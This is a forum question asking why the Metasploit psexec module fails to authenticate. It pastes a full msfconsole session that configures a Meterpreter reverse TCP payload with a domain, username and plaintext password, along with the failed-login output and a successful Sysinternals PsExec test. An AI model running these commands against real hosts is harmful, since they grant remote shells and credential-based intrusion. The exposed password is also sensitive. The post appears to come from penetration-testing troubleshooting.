Knowledge Base

Ask A Question



psexec exploit in metasploit

Hi All, Please see the error message when running exploit. It does not seem to get past authentication. msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set RHOST RHOST => msf exploit(windows/smb/psexec) > set LHOST LHOST => msf exploit(windows/smb/psexec) > set SMBDomain CORP SMBDomain => CORP msf exploit(windows/smb/psexec) > set SMBUser "localadmin" SMBUser => localadmin msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd" SMBPass => MrPassw0rd msf exploit(windows/smb/psexec) > set LPORT 4444 LPORT => 443 msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on [*] - Connecting to the server... [*] - Authenticating to| as user 'CORP\localadmin'... [-] - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host. [*] Exploit completed, but no session was created. msf exploit(windows/smb/psexec) > version Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b I tested authentication by running the sysinternals psexec Outside of metasploit. psexec was successful. C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\ -u CORP\localadmin cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - Password: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami CORP\localadmin Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA

Posted by aa about a year ago